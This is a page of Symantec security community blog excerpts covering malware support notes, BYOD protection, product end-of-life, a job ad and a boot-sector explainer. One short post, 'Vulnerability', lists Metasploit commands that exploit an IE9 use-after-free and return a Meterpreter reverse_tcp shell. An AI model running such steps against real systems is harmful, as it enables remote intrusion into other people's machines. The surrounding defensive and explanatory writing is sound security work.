Video Screencast Help
Search Video Help Close Back
to help

Security Community Blog

Showing posts tagged with 9.x and Earlier
Showing posts in English
W32.Inabot - Support Perspective and Battle Plan
Brandon Noble | 25 Apr 2013 | 2 comments

I. BACKGROUND:
We have been receiving a few scattered cases of outbreaks from a file labeled snkb00ptz.exe or snkb0ptz.exe, but it seems to be on the rise.

It's normally considered poor troubleshooting to use the file name for any type of identification of a threat, but recent examples have made this practical. Even though these files were detected as many different threat names and families (Trojan.gen, w32.IRCBot.NG, Downloader, etc), the cases all reported the same behavior and symptoms.

After some additional investigation, Symantec Security Response has broken out detection for W32.Inabot. That's short for the Insomnia IRC bot. More information is available from the makers of this threat in their manual, here: http://pastebin.com/dvpu8Zwb

For those of you familiar with W32.Changeup, much of this...

Read more
Using Symantec Protection Suite Enterprise Edition (SPS EE) to protect user-owned tablets and smartphones from Internet threats
Duncan Mills | 04 Apr 2013 | 0 comments

The increased use in the workplace of user-owned devices such as smartphones and tablets, often referred to as bring your own device (BYOD), provides businesses with significant productivity and cost benefits. However, it also presents a number of complex challenges related to security.

Due to the rise of smart media devices like smartphones, tablets and ultrabooks, it is estimated that potentially, as many as 30-35%* of endpoints connected to a company’s network could be unmanaged. These are more at risk than managed endpoints which are typically subject to software patching and endpoint security policies.

Of course unmanaged endpoints are still protected by your perimeter security, such as secure web gateways. However, these have typically evolved from caching proxies and URL filters. What you need is an additional layer of security that provides the best possible levels of protection for unmanaged endpoints.

Symantec Web Gateway (SWG) will...

Read more
W32.Changeup keeps on giving
Brandon Noble | 28 May 2013 | 13 comments

I. BACKGROUND:
In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

Read more
Vulnerability
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Read more
Java 0-Day Coverage
Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Read more
Symantec Anti-Virus 10 End-of-Life Announcement.
Nick Kelly | 24 Jul 2011 | 0 comments

Just an FYI if there is still a SAV installation in your environment. Symantec Anti-Virus patch releases and assisted support will be end-of-life next year. For assistance in migrating to SEP, please contact your local account team.  For operating systems and applications not supported by SEP, there are alternative solutions in the Symantec product portfolio that can help protect your environment.

 

http://www.symantec.com/business/support/index?page=releasedetails&key=51852

 

SAV 10 original Release Date: 2005-04-27

End of Engineering Support 2012-07-04  (Last date for patch releases)

End of Assisted Support 2012-07-04 (Last date to contact support)

 

Thanks!

Read more
Job Opportunity: Symantec Security Consultant
Chad Dupin | 01 Jun 2011 | 0 comments

ITS Partner is looking to hire a few Symantec Security Consultants / Engineers.

 

Location

West Michigan / Grand Rapids, MI Area.

Job Summary

This position will be focused on the implementation of Symantec security products within various customer environments. Job responsibilities include assessing customer needs and expectations, designing solutions to meet those needs, and then implementing the design. In addition to these activities the consultant will participate in the sales process (proposal creation, presentations, sales calls, demos, etc.). This position has the opportunity to grow into a leadership role within ITS to help guide and direct the security team.

Preferred Technical Qualifications

  • Symantec Endpoint Protection
  • Symantec Endpoint Encryption
  • Symantec Data Loss Prevention
  • Control Compliance Suite
  • PGP

Technical Knowledge

...
Read more
How is the content downloaded via LU secure?
P_K_ | 25 Jan 2011 | 0 comments

How is the content downloaded via LU secure?

The Live update TRI files are downloaded in an archive format

These minitri’s and livetri.zip files consists of 3 files

  • liveupdt.sig
  • liveupdt.grd
  • liveupdt.tri

GRD and SIG files are used to verify security and integrity of patches

The Mini-tri Zip is Validated by GRD file and also Authenticated by SIG file

The  Guard file use  SHA-1 hash values

For Live update the protocols that are used is  HTTP/FTP server. These live update is hosted by Akamai.

Published using Java Triage and they are Signed by Symantec Digital Signing Servers.

Read more
Your opportunity to provide usability feedback about security products
UCD4me | 05 Jan 2011 | 0 comments

The User Centered Design (UCD) team here at Symantec exists to help make customer experiences easier, more efficient and more useful for you.  Right now, we're ramping up several research projects where we are looking for those in security and compliance with a manger, director or CISO role to give us feedback in the form of short user stories.  This should require only a 30-45 minute commitment on the phone to share experiences and points of pain, and this effort is "product agnostic" so as long as you are involved with security, regardless of products used, we'd like to hear from you!

 

If you are interested, please email Kellie Mecham at kellie_mecham@symantec.com to arrange a date and time for the phone interview. 

 

We look forward to hearing from you!

 

Best wishes,

 

Kellie

 

 

Read more
Learn about the Boot Sector virus
mon_raralio | 23 Sep 2010 | 1 comment

What is a sector?

Before we begin, we must first determine what is a sector. A sector is a subdivision of a drive. The term is derived from the mathematical term for a portion of a circle (an arc) that is enclosed by 2 radii or lines from the center to the edge of a circle. So in computer storage terms, a sector is an an arc where data is written. Note: Drawing is not by best work.
 
So, what and where is a boot sector?
 
In order for a PC to be useable, it need to powerup and boot.And the PC has 2 stages of booting up.The first stage boot loader is the BIOS. This is so that all the primary hardwares would come online and be able to communicate with one another. This also contains instructions on which hardware - usually a storage device - to access to get to...
Read more